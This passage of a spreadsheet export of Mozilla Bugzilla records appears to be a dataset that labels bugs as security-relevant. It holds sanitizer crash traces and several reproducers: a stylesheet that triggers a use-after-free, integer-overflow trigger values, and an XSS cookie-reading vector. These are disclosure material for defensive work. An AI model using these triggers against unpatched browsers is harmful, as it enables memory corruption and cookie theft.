    #1 0x7fe96c6d281c in graphite2::Face::Table::Table(graphite2::Face const&amp;, graphite2::TtfUtil::Tag, unsigned int) /src/Face.cpp:277
    #2 0x7fe96c6ea5b3 in graphite2::GlyphCache::Loader::Loader(graphite2::Face const&amp;, bool) /src/GlyphCache.cpp:248
    #3 0x7fe96c6e1211 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&amp;, unsigned int) /src/GlyphCache.cpp:123
    #4 0x7fe96c6ce304 in graphite2::Face::readGlyphs(unsigned int) /src/Face.cpp:98
    #5 0x7fe96c66ba7b in (anonymous namespace)::load_face(graphite2::Face&amp;, unsigned int) /src/gr_face.cpp:54
    #6 0x7fe96c66ef79 in gr_make_face_with_ops /src/gr_face.cpp:89
    #7 0x7fe96c66ef79 in gr_make_file_face /src/gr_face.cpp:242
    #8 0x48ed05 in Parameters::testFileFont() const /gr2fonttest/gr2FontTest.cpp:618
    #9 0x49248b in main /gr2fonttest/gr2FontTest.cpp:770
    #10 0x7fe96c2acec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #11 0x486c4c in _start (/build/gr2fonttest/gr2fonttest+0x486c4c)
0x60200000efd1 is located 0 bytes to the right of 1-byte region [0x60200000efd0,0x60200000efd1)
allocated by thread T0 here:
    #0 0x46df61 in __interceptor_malloc (/build/gr2fonttest/gr2fonttest+0x46df61)
    #1 0x7fe96c760bfe in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) /src/FileFace.cpp:90
    #2 0x7fe96c6d279f in graphite2::Face::Table::Table(graphite2::Face const&amp;, graphite2::TtfUtil::Tag, unsigned int) /src/Face.cpp:274
    #3 0x7fe96c6ea5b3 in graphite2::GlyphCache::Loader::Loader(graphite2::Face const&amp;, bool) /src/GlyphCache.cpp:248
    #4 0x7fe96c6e1211 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&amp;, unsigned int) /src/GlyphCache.cpp:123
    #5 0x7fe96c6ce304 in graphite2::Face::readGlyphs(unsigned int) /src/Face.cpp:98
SUMMARY: AddressSanitizer: heap-buffer-overflow /src/TtfUtil.cpp:273 graphite2::TtfUtil::CheckTable(graphite2::TtfUtil::Tag, void const*, unsigned long)
Shadow bytes around the buggy address:
  0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa[01]fa fa fa 00 04
  0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e4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1667==ABORTING
Note that this is on graphite2 trunk and without OTS in front of it. We tested this particular file and Firefox and it is rejected by OTS with:
Sill: invalid table offset
However, according to cdiehl that doesn't necessarily mean that the bug cannot be reached through OTS (e.g. by fixing up the testcase enough to make it through). Marking s-s until we confirmed that this bug cannot be reached/exploited with OTS enabled.</t>
        </is>
      </c>
      <c r="X251" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="252">
      <c r="A252" t="n">
        <v>516237</v>
      </c>
      <c r="B252" t="inlineStr">
        <is>
          <t>2009-09-13 04:55:38 -0700</t>
        </is>
      </c>
      <c r="C252" t="inlineStr">
        <is>
          <t>nsTreeSelection::SetTree doesn't addref the tree</t>
        </is>
      </c>
      <c r="D252" t="inlineStr">
        <is>
          <t>2010-04-01 20:17:32 -0700</t>
        </is>
      </c>
      <c r="E252" t="n">
        <v>1</v>
      </c>
      <c r="F252" t="n">
        <v>1</v>
      </c>
      <c r="G252" t="n">
        <v>3</v>
      </c>
      <c r="H252" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I252" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J252" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K252" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L252" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M252" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N252" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O252" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P252" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q252" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R252" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S252" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T252" t="n">
        <v>1</v>
      </c>
      <c r="U252" t="n">
        <v>0</v>
      </c>
      <c r="V252" t="n">
        <v>36</v>
      </c>
      <c r="W252" t="inlineStr">
        <is>
          <t>This needs a testcase, but it seems that nsITreeSelection::tree handling
is wrong. The interface is scriptable, so a script may set the .tree.
nsTreeSelection then later uses that object, but nothing guarantees that
the object is alive.</t>
        </is>
      </c>
      <c r="X252" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="253">
      <c r="A253" t="n">
        <v>90145</v>
      </c>
      <c r="B253" t="inlineStr">
        <is>
          <t>2001-07-10 09:22:36 -0700</t>
        </is>
      </c>
      <c r="C253" t="inlineStr">
        <is>
          <t>Cannot reach any secure site</t>
        </is>
      </c>
      <c r="D253" t="inlineStr">
        <is>
          <t>2016-09-27 13:03:20 -0700</t>
        </is>
      </c>
      <c r="E253" t="n">
        <v>1</v>
      </c>
      <c r="F253" t="n">
        <v>1</v>
      </c>
      <c r="G253" t="n">
        <v>6</v>
      </c>
      <c r="H253" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I253" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J253" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K253" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L253" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M253" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N253" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O253" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P253" t="inlineStr"/>
      <c r="Q253" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R253" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S253" t="inlineStr">
        <is>
          <t>psm2.1</t>
        </is>
      </c>
      <c r="T253" t="n">
        <v>1</v>
      </c>
      <c r="U253" t="n">
        <v>0</v>
      </c>
      <c r="V253" t="n">
        <v>10</v>
      </c>
      <c r="W253" t="inlineStr">
        <is>
          <t>7/10 commercial branch WinNT build.
1.) Attempt to reach the above site or any secure site.
What happens: The site cannot be reached, or a blank page appears.</t>
        </is>
      </c>
      <c r="X253" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="254">
      <c r="A254" t="n">
        <v>821624</v>
      </c>
      <c r="B254" t="inlineStr">
        <is>
          <t>2012-12-14 01:14:29 -0800</t>
        </is>
      </c>
      <c r="C254" t="inlineStr">
        <is>
          <t>Support for specifying promptWaitTime for updates</t>
        </is>
      </c>
      <c r="D254" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:47 -0700</t>
        </is>
      </c>
      <c r="E254" t="n">
        <v>1</v>
      </c>
      <c r="F254" t="n">
        <v>1</v>
      </c>
      <c r="G254" t="n">
        <v>5</v>
      </c>
      <c r="H254" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I254" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J254" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K254" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L254" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M254" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N254" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O254" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P254" t="inlineStr"/>
      <c r="Q254" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R254" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S254" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T254" t="n">
        <v>1</v>
      </c>
      <c r="U254" t="n">
        <v>0</v>
      </c>
      <c r="V254" t="n">
        <v>6</v>
      </c>
      <c r="W254" t="inlineStr">
        <is>
          <t>Bug 813322 added a new parameter to control how long the updater waits before showing a dialog to user asking them to restart. Bug 816408 is about adding support to AUSv2. This bug is about making sure we support it in the releases automation.
From a quick discussion with bhearsum this might turn out to be a no-op. We're proposing we handle this like 'actions  silent' for suppressing What's New pages after updates, in that the patcher config is modified by a release engineer if desired. If we use the same parameter name in patcher config, snippets and AUS we might not need any changes in the snippet generator due to
 https://github.com/mozilla/build-tools/blob/master/lib/python/release/updates/snippets.py#L66</t>
        </is>
      </c>
      <c r="X254" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="255">
      <c r="A255" t="n">
        <v>503286</v>
      </c>
      <c r="B255" t="inlineStr">
        <is>
          <t>2009-07-09 04:45:53 -0700</t>
        </is>
      </c>
      <c r="C255" t="inlineStr">
        <is>
          <t>browser crash when search suggestions show [@ js_Interpret ] [@ js_Execute]</t>
        </is>
      </c>
      <c r="D255" t="inlineStr">
        <is>
          <t>2013-03-11 11:22:38 -0700</t>
        </is>
      </c>
      <c r="E255" t="n">
        <v>1</v>
      </c>
      <c r="F255" t="n">
        <v>1</v>
      </c>
      <c r="G255" t="n">
        <v>3</v>
      </c>
      <c r="H255" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I255" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J255" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K255" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L255" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M255" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N255" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O255" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P255" t="inlineStr">
        <is>
          <t>[sg:critical] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q255" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R255" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S255" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T255" t="n">
        <v>1</v>
      </c>
      <c r="U255" t="n">
        <v>1</v>
      </c>
      <c r="V255" t="n">
        <v>66</v>
      </c>
      <c r="W255" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.2; ru; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) AutoPager/0.5.2.2 (http://www.teesoft.info/)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.2; ru; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729) AutoPager/0.5.2.2 (http://www.teesoft.info/)
If start type search request in main form browser crash immediately. Crash only on some requests.
Reproducible: Always
Steps to Reproduce:
1. Go to www.aport.ru
2. In input form type one charater: 't'
3. Browser crash immediately.
Actual Results:  
Browser crash immediately.
Expected Results:  
Search suggestions showed</t>
        </is>
      </c>
      <c r="X255" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="256">
      <c r="A256" t="n">
        <v>367736</v>
      </c>
      <c r="B256" t="inlineStr">
        <is>
          <t>2007-01-22 06:31:47 -0800</t>
        </is>
      </c>
      <c r="C256" t="inlineStr">
        <is>
          <t>potential sign problems in nsEscapeCount</t>
        </is>
      </c>
      <c r="D256" t="inlineStr">
        <is>
          <t>2008-09-23 21:26:49 -0700</t>
        </is>
      </c>
      <c r="E256" t="n">
        <v>1</v>
      </c>
      <c r="F256" t="n">
        <v>1</v>
      </c>
      <c r="G256" t="n">
        <v>3</v>
      </c>
      <c r="H256" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I256" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J256" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K256" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L256" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M256" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N256" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O256" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P256" t="inlineStr">
        <is>
          <t>[sg:high?]</t>
        </is>
      </c>
      <c r="Q256" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R256" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S256" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T256" t="n">
        <v>1</v>
      </c>
      <c r="U256" t="n">
        <v>0</v>
      </c>
      <c r="V256" t="n">
        <v>33</v>
      </c>
      <c r="W256" t="inlineStr">
        <is>
          <t>potential sign problems in nsEscapeCount
http://lxr.mozilla.org/seamonkey/source/xpcom/io/nsEscape.cpp#76 
76 static char* nsEscapeCount(
 77     const char * str,
 [78]     PRInt32 len,
 79     nsEscapeMask flags,
 80     PRInt32* out_len)
 81 //----------------------------------------------------------------------------------------
 82 {
 83     if (!str)
 84         return 0;
 85 
 [86]     int i, extra = 0;
 87     static const char hexChars[] = "0123456789ABCDEF";
 88 
 89     register const unsigned char* src = (const unsigned char *) str;
 [90]     for (i = 0; i &lt; len; i++)
 91     {
 92         if (!IS_OK(*src++))
 [93]             extra += 2; /* the escape, plus an extra byte for each nibble */
 94     }
 95 
 [96]     char* result = (char *)nsMemory::Alloc(len + extra + 1);
a potentia issue here, probably exploitable on 64
bit systems.
1. [76] and [86] are signed. if len == 0x80000000 == 1 &lt;&lt; 31 the loop
is not entered and [96] allocates just (1&lt;&lt;31) +1 luckily positive to
avoid sign promotion.
2. for len == 0x55555555 (about 1365MB) and always doing += 2
the allocation evaluates to zero meaning trouble. 
for len &gt; 0x55555555 sign also causes trouble.
potential exploit via feeding a string via the gopher protocol seems
unfeasible: doesn't succeed after 12 hours on a maching with 1.5G RAM.
proposed solution:
fixing the sign and checking for overflow of |extra += 2|</t>
        </is>
      </c>
      <c r="X256" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="257">
      <c r="A257" t="n">
        <v>419846</v>
      </c>
      <c r="B257" t="inlineStr">
        <is>
          <t>2008-02-27 07:37:47 -0800</t>
        </is>
      </c>
      <c r="C257" t="inlineStr">
        <is>
          <t>Non-chrome XUL documents can load chrome scripts from the fastload file</t>
        </is>
      </c>
      <c r="D257" t="inlineStr">
        <is>
          <t>2009-01-05 11:43:07 -0800</t>
        </is>
      </c>
      <c r="E257" t="n">
        <v>1</v>
      </c>
      <c r="F257" t="n">
        <v>1</v>
      </c>
      <c r="G257" t="n">
        <v>3</v>
      </c>
      <c r="H257" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I257" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J257" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K257" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L257" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M257" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N257" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O257" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P257" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q257" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R257" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S257" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T257" t="n">
        <v>1</v>
      </c>
      <c r="U257" t="n">
        <v>0</v>
      </c>
      <c r="V257" t="n">
        <v>21</v>
      </c>
      <c r="W257" t="inlineStr">
        <is>
          <t>Without using overlay, non-chrome XUL documents can load chrome scripts from
the fastload file by using &lt;script&gt; elements.  This is exploitable in the same
way as bug 390813.</t>
        </is>
      </c>
      <c r="X257" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="258">
      <c r="A258" t="n">
        <v>1336832</v>
      </c>
      <c r="B258" t="inlineStr">
        <is>
          <t>2017-02-05 13:41:45 -0800</t>
        </is>
      </c>
      <c r="C258" t="inlineStr">
        <is>
          <t>UAF in txExecutionState destructor during XSLT processing</t>
        </is>
      </c>
      <c r="D258" t="inlineStr">
        <is>
          <t>2024-05-30 09:25:43 -0700</t>
        </is>
      </c>
      <c r="E258" t="n">
        <v>1</v>
      </c>
      <c r="F258" t="n">
        <v>1</v>
      </c>
      <c r="G258" t="n">
        <v>3</v>
      </c>
      <c r="H258" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I258" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J258" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K258" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L258" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M258" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N258" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O258" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P258" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+][adv-esr45.9+]</t>
        </is>
      </c>
      <c r="Q258" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R258" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S258" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T258" t="n">
        <v>1</v>
      </c>
      <c r="U258" t="n">
        <v>0</v>
      </c>
      <c r="V258" t="n">
        <v>31</v>
      </c>
      <c r="W258" t="inlineStr">
        <is>
          <t>Tested under xpcshell "JavaScript-C54.0a1"
[+] Relevant parts
xsl_str = '&lt;xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"&gt;' +
          '  &lt;xsl:variable name="var_1"&gt;' +
          '    &lt;xsl:for-each select="/"&gt;' +
          '      &lt;xsl:value-of select="count()"/&gt;' +
          '    &lt;/xsl:for-each&gt;' +
          '  &lt;/xsl:variable&gt;' +
          '  &lt;xsl:template match="/"&gt;' +
          '    &lt;xsl:value-of select="//*[1 = $var_1]"/&gt;' +
          '  &lt;/xsl:template&gt;' +
          '&lt;/xsl:stylesheet&gt;'
[+] How to reproduce
$ ./poc_xslt_uaf_txExecutionState_dtor.js
==20312==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000060790 at pc 0x7ff772355740 bp 0x7ffd9f4ad0c0 sp 0x7ffd9f4ad0b8
READ of size 8 at 0x603000060790 thread T0
    #0 0x7ff77235573f in txExecutionState::~txExecutionState() /home/worker/workspace/build/src/dom/xslt/xslt/txExecutionState.cpp:98:5
    #1 0x7ff77238e015 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:701:1
    #2 0x7ff772393bdb in TransformToDocument /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:645:12
    ...
0x603000060790 is located 0 bytes inside of 24-byte region [0x603000060790,0x6030000607a8)
freed by thread T0 here:
    #0 0x4b20db in free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7ff772363cdc in txLoopNodeSet::execute(txExecutionState&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txInstructions.cpp:477:9
    #2 0x7ff7723c4aed in txXSLTProcessor::execute(txExecutionState&amp;) /home/worker/workspace/build/src/dom/xslt/xslt/txXSLTProcessor.cpp:49:14
    #3 0x7ff77238dc18 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:676:14
    #4 0x7ff772393bdb in TransformToDocument /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:645:12
     ...
previously allocated by thread T0 here:
    #0 0x4b23fb in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4df2ad in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7ff772355bdc in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7ff772355bdc in txExecutionState::init(txXPathNode const&amp;, txOwningExpandedNameMap&lt;txIGlobalParameter&gt;*) /home/worker/workspace/build/src/dom/xslt/xslt/txExecutionState.cpp:110
    #4 0x7ff77238dc01 in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:672:19
    #5 0x7ff772393bdb in TransformToDocument /home/worker/workspace/build/src/dom/xslt/xslt/txMozillaXSLTProcessor.cpp:645:12
    ...</t>
        </is>
      </c>
      <c r="X258" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="259">
      <c r="A259" t="n">
        <v>1525632</v>
      </c>
      <c r="B259" t="inlineStr">
        <is>
          <t>2019-02-06 09:01:37 -0800</t>
        </is>
      </c>
      <c r="C259" t="inlineStr">
        <is>
          <t>DNS-over-HTTPS experiment 6 - investigation impact of ECS (location hint) information with DNS</t>
        </is>
      </c>
      <c r="D259" t="inlineStr">
        <is>
          <t>2019-07-04 01:29:40 -0700</t>
        </is>
      </c>
      <c r="E259" t="n">
        <v>1</v>
      </c>
      <c r="F259" t="n">
        <v>1</v>
      </c>
      <c r="G259" t="n">
        <v>5</v>
      </c>
      <c r="H259" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I259" t="inlineStr">
        <is>
          <t>Data Science</t>
        </is>
      </c>
      <c r="J259" t="inlineStr">
        <is>
          <t>Experiment Collaboration</t>
        </is>
      </c>
      <c r="K259" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L259" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M259" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N259" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O259" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P259" t="inlineStr"/>
      <c r="Q259" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R259" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S259" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T259" t="n">
        <v>1</v>
      </c>
      <c r="U259" t="n">
        <v>0</v>
      </c>
      <c r="V259" t="n">
        <v>10</v>
      </c>
      <c r="W259" t="inlineStr">
        <is>
          <t>Brief description of the request:
We'd like to conduct a study of DoH / ECS
Link to any assets:
https://docs.google.com/document/d/1v-oZtJCPHU9VD3UeXvt4F533Njbbr47qR9WvOlkv-uA/edit (not complete)
Is there a specific data scientist you would like or someone who has helped to triage this request:
Tim!</t>
        </is>
      </c>
      <c r="X259" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="260">
      <c r="A260" t="n">
        <v>1421324</v>
      </c>
      <c r="B260" t="inlineStr">
        <is>
          <t>2017-11-28 08:47:51 -0800</t>
        </is>
      </c>
      <c r="C260" t="inlineStr">
        <is>
          <t>Overwrite of existing cookie with HttpOnly flagged cookie results in HttpOnly being ignored by Firefox</t>
        </is>
      </c>
      <c r="D260" t="inlineStr">
        <is>
          <t>2024-05-30 09:39:04 -0700</t>
        </is>
      </c>
      <c r="E260" t="n">
        <v>1</v>
      </c>
      <c r="F260" t="n">
        <v>1</v>
      </c>
      <c r="G260" t="n">
        <v>3</v>
      </c>
      <c r="H260" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I260" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J260" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K260" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L260" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M260" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N260" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O260" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P260" t="inlineStr">
        <is>
          <t>[necko-triaged][adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q260" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R260" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S260" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T260" t="n">
        <v>1</v>
      </c>
      <c r="U260" t="n">
        <v>0</v>
      </c>
      <c r="V260" t="n">
        <v>25</v>
      </c>
      <c r="W260" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Steps to reproduce:
A HTTP Request is sent to the server (192.168.1.1), which responds with with a Set-Cookie (without HttpOnly flag) statement to set a cookie:
Example Response:
HTTP/1.1 302 Found
Content-Type: text/html
Content-Length: 287
Location: http://192.168.1.1/webpage.php?id=1
Connection: close
Set-Cookie: PHPSESSID=qevb2lkbjviniu2i3ie278tp45; path=/
&lt;...&gt;
The cookie PHPSESSID is set in Firefox, and the Browser follows the Location redirect to the webpage (same server 192.168.1.1) issuing the following request:
GET /webpage.php?id=1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.1.1/login.php
Cookie: PHPSESSID=qevb2lkbjviniu2i3ie278tp45
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
This request results in the following response from the server setting a HttpOnly protected cookie (overwriting the existing one with additional HttpOnly flag):
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 303
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=qevb2lkbjviniu2i3ie278tp45; path=/; httponly
Vary: Accept-Encoding
&lt;...&gt;
Summary:
=========
"Upgrading/Overwriting" a normal cookie to a httponly flagged cookie.
Actual results:
The cookie is, although now flagged with httponly, still accessible via JavaScript:
PoC 1:
Web Console:
document.cookie
"PHPSESSID=qevb2lkbjviniu2i3ie278tp45"
PoC 2:
also works via Cross-Site Scripting vector, aka:
&lt;script&gt;alert(document.cookie)&lt;/script&gt;
-&gt; resulting in an alert box disclosing the cookie value
Expected results:
After setting the httpOnly flag, the cookie should be protected from accessing it via JavaScript. This is a Cross-Site Scripting prevention meassure which seems to not work as intended anymore (worked as intended in earlier versions of Firefox, and works as intended in other Browsers (Chrome)).</t>
        </is>
      </c>
      <c r="X260" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="261">
      <c r="A261" t="n">
        <v>293985</v>
      </c>
      <c r="B261" t="inlineStr">
        <is>
          <t>2005-05-12 23:14:27 -0700</t>
        </is>
      </c>
      <c r="C261" t="inlineStr">
        <is>
          <t>[BUGZILLA] FetchBug repeats bug info in last channel if a product has more than one channel</t>
        </is>
      </c>
      <c r="D261" t="inlineStr">
        <is>
          <t>2019-02-25 09:00:55 -0800</t>
        </is>
      </c>
